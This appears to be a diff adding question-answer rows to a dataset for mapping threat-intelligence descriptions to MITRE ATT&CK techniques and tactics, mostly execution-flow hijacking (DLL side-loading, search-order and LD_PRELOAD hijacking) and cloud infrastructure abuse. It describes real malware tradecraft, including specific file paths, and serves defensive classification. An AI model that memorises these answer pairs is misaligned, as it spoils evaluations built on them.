+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HUI Loader can be deployed to targeted systems via legitimate programs that are vulnerable to DLL search order hijacking.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit has used DLL Search Order Hijacking to load oci.dll as a persistence mechanism.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz can use DLL hijacking to bypass security controls.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MirageFox is likely loaded via DLL hijacking into a legitimate McAfee binary.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX has the ability to use DLL search order hijacking for installation on targeted systems.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prikormka uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can hijack outdated Windows application dependencies with malicious versions of its own DLL payload.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves is launched through use of DLL search order hijacking to load a malicious dll.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Variants of WEBC2 achieve persistence by using DLL search order hijacking, usually by copying the DLL file to %SYSTEMROOT% (C:\WINDOWS\ntshrui.dll).","Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker has performed DLL hijacking before execution.,"Tecnique: T1574.001 Hijack Execution Flow: DLL Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the legitimate Windows services `IKEEXT` and `PrintNotify` to side-load malicious DLLs.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has been known to side load DLLs with a valid version of Chrome with one of their tools.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used legitimate executables to perform DLL side-loading of their malware.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used legitimate applications to side-load malicious DLLs.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used DLL side loading by giving DLLs hardcoded names and placing them in searched directories.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used side loading to place malicious DLLs in memory.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has abused legitimate executables to side-load weaponized DLLs.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has placed a malicious payload in `%WINDIR%\SYSTEM32\oci.dll` so it would be sideloaded by the MSDTC service.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used IISCrack.dll as a side-loading technique to load a malicious version of httpodbc.dll on old IIS Servers (CVE-2001-0507).,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used DLL side-loading to covertly load PoisonIvy into memory on the victim machine.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa’s JavaScript file used a legitimate Microsoft Office 2007 package to side-load the OINFO12.OCX dynamic link library.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has replaced `win_fw.dll`, an internal component that is executed during IDA Pro installation, with a malicious DLL to download and execute a payload.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used legitimate executables such as `winword.exe` and `igfxem.exe` to side-load their malware.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has used DLL side-loading to load malicious DLL's into legitimate executables.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Patchwork .dll that contains BADNEWS is loaded and executed using DLL side-loading.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used DLL side-loading to drop and execute malicious payloads including the hijacking of the legitimate Windows application file rekeywiz.exe.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used DLL side-loading, including by using legitimate Kaspersky antivirus variants as well as `rc.exe`, a legitimate Microsoft Resource Compiler.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as UPPERCUT.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS typically loads its DLL file into a legitimate signed Java or VMware executable.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DLL side-loading has been used to execute BBSRAT through a legitimate Citrix executable, ssonsvr.exe. The Citrix executable was dropped along with BBSRAT by the dropper.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has loaded a malicious DLL by spoofing the name of the legitimate Version.DLL and placing it in the same folder as the digitally-signed Microsoft binary OneDriveUpdater.exe.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chinoxy can use a digitally signed binary (""Logitech Bluetooth Wizard Host Process"") to load its dll into memory.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can store a file named `mpsvc.dll`, which opens a malicious `mpsvc.mui` file, in the same folder as the legitimate Microsoft executable `MsMpEng.exe` to gain execution.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate includes one infection vector that leverages a malicious ""KeyScramblerE.DLL"" library that will load during the execution of the legitimate KeyScrambler application.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis exploits a security vulnerability to load a fake DLL and execute its code.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex can abuse legitimate Windows executables to side-load malicious DLL files.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ecipekac can abuse the legitimate application policytool.exe to load a malicious DLL.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has used DLL side-loading to execute its payload.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher uses DLL side-loading to load malicious programs.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser has used DLL side-loading.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali can use DLL side-loading to load malicious DLLs into legitimate executables.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kerrdown can use DLL side-loading to load malicious DLLs.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoFiSe has been executed as a file named DsNcDiag.dll through side-loading.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack side loads its communications module as a DLL into the libcurl.dll loader.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has side-loaded its malicious DLL file.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae can use DLL side-loading to gain execution.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja loaders can be side-loaded with legitimate and signed executables including the VLC.exe media player.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora can use DLL side-loading to execute malicious payloads.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pcexter has been distributed and executed as a DLL file named Vspmsg.dll via DLL side-loading.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX has used DLL side-loading to evade anti-virus.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowGoop can side-load `Goopdate.dll` into `GoogleUpdate.exe`.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has the ability to use DLL side-loading for execution.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can be installed via DLL side-loading.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use side-loading to run malicious executables.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sakula uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can load DLLs through vulnerable legitimate executables.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the T9000 installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear has used DLL side loading to import and load a malicious DLL loader.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wingbird side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.","Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT has used DLL side-loading to load malicious payloads.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A gh0st RAT variant has used DLL side-loading.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can support an HKCMD sideloading start method.,"Tecnique: T1574.002 Hijack Execution Flow: DLL Side-Loading, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has a dylib hijacker module that generates a malicious dylib given the path to a legitimate dylib of a vulnerable application.,"Tecnique: T1574.004 Hijack Execution Flow: Dylib Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has configured payloads to load via LD_PRELOAD.,"Tecnique: T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.,"Tecnique: T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER copies the malicious file /data2/.bd.key/preload.so to /lib/preload.so, then launches a child process that executes the malicious file /data2/.bd.key/authd as /bin/authd with the arguments /lib/preload.so reboot newreboot 1. This injects the malicious preload.so file into the process with PID 1, and replaces its reboot function with the malicious newreboot function for persistence.","Tecnique: T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has injected its dynamic library into descendent processes of sshd via LD_PRELOAD.,"Tecnique: T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HiddenWasp adds itself as a shared object to the LD_PRELOAD environment variable.,"Tecnique: T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has modified /etc/ld.so.preload to intercept shared library import functions.,"Tecnique: T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET adds malicious file paths to the DYLD_FRAMEWORK_PATH and DYLD_LIBRARY_PATH environment variables to execute malicious code.,"Tecnique: T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate overrides the %windir% environment variable by setting a Registry key, HKEY_CURRENT_User\Environment\windir, to an alternate command to execute a malicious AutoIt script. This allows DarkGate to run every time the scheduled task DiskCleanup is executed as this uses the path value %windir%\system32\cleanmgr.exe for execution.","Tecnique: T1574.007 Hijack Execution Flow: Path Interception by PATH Environment Variable, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire contains modules that can discover and exploit path interception opportunities in the PATH environment variable.,"Tecnique: T1574.007 Hijack Execution Flow: Path Interception by PATH Environment Variable, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit path interception opportunities in the PATH environment variable.,"Tecnique: T1574.007 Hijack Execution Flow: Path Interception by PATH Environment Variable, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.,"Tecnique: T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit search order hijacking vulnerabilities.,"Tecnique: T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire contains modules that can discover and exploit unquoted path vulnerabilities.,"Tecnique: T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit unquoted path vulnerabilities.,"Tecnique: T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.","Tecnique: T1574.010 Hijack Execution Flow: Services File Permissions Weakness, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors used a batch file that modified the COMSysApp service to load a malicious ipnet.dll payload and to load a DLL into the `svchost.exe` process.","Tecnique: T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable to execute a malicious DLL whenever a process loads the .NET CLR.,"Tecnique: T1574.012 Hijack Execution Flow: COR_PROFILER, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can detect profilers by verifying the `COR_ENABLE_PROFILING` environment variable is present and active.,"Tecnique: T1574.012 Hijack Execution Flow: COR_PROFILER, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has abused the KernelCallbackTable to hijack process control flow and execute shellcode.,"Tecnique: T1574.013 Hijack Execution Flow: KernelCallbackTable, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher has used the KernelCallbackTable to hijack the execution flow of a process by replacing the __fnDWORD function with the address of a created Asynchronous Procedure Call stub routine.,"Tecnique: T1574.013 Hijack Execution Flow: KernelCallbackTable, Tactic: TA0005 Defense Evasion TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can create snapshots of EBS volumes and RDS instances.,"Tecnique: T1578.001 Modify Cloud Compute Infrastructure: Create Snapshot, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used access to the victim's Azure tenant to create Azure VMs.","Tecnique: T1578.002 Modify Cloud Compute Infrastructure: Create Cloud Instance, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets.,"Tecnique: T1578.002 Modify Cloud Compute Infrastructure: Create Cloud Instance, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used access to the victim's Azure tenant to create Azure VMs.
+
+Scattered Spider has also created Amazon EC2 instances within the victim's environment.","Tecnique: T1578.002 Modify Cloud Compute Infrastructure: Create Cloud Instance, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has deleted the target's systems and resources in the cloud to trigger the organization's incident and crisis response process.,"Tecnique: T1578.003 Modify Cloud Compute Infrastructure: Delete Cloud Instance, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider enumerates cloud environments to identify server and backup management infrastructure, resource access, databases and storage containers.","Tecnique: T1580 Cloud Infrastructure Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can enumerate AWS infrastructure, such as EC2 instances.","Tecnique: T1580 Cloud Infrastructure Discovery, Tactic: TA0007 Discovery"
